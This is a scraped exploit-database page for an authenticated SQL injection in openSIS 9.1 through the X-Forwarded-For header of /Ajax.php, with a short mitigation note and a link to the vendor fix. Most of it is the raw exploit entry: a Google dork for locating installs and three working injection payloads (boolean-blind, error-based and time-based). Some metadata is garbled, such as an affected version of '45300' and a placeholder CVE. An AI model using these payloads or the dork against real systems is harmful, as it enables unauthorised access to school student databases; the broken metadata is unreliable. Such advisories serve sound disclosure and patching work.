Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
openSIS 9.1 - SQL Injection (Authenticated) - exploit.company
header-logo
Suggest Exploit
vendor:
Open Source Information System Community
by:
Devrim Dıragumandan (d0ub1edd)
6.1
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Open Source Information System Community
Affected Version From: 9.1
Affected Version To: 45300
Patch Exists: YES
Related CWE: CVE-2024-XXXX (example)
CPE: a:os4ed:opensis:9.1
Platforms Tested: Linux
2024

openSIS 9.1 – SQL Injection (Authenticated)

A SQL injection vulnerability was discovered in OS4Ed Open Source Information System Community version 9.1. By manipulating the 'X-Forwarded-For' header parameters in a POST request to /Ajax.php, an attacker can execute malicious SQL queries.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the fix provided by the vendor at https://github.com/OS4ED/openSIS-Classic/pull/322. Additionally, input validation and sanitization should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: openSIS 9.1 - SQLi (Authenticated)
# Google Dork: intext:"openSIS is a product"
# Date: 09.09.2024
# Exploit Author: Devrim Dıragumandan (d0ub1edd)
# Vendor Homepage: https://www.os4ed.com/
# Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1
# Version: 9.1
# Tested on: Linux

A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php. 

GET /Ajax.php?modname=x HTTP/1.1

---
    Parameter: X-Forwarded-For #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae
--- 

FIX: https://github.com/OS4ED/openSIS-Classic/pull/322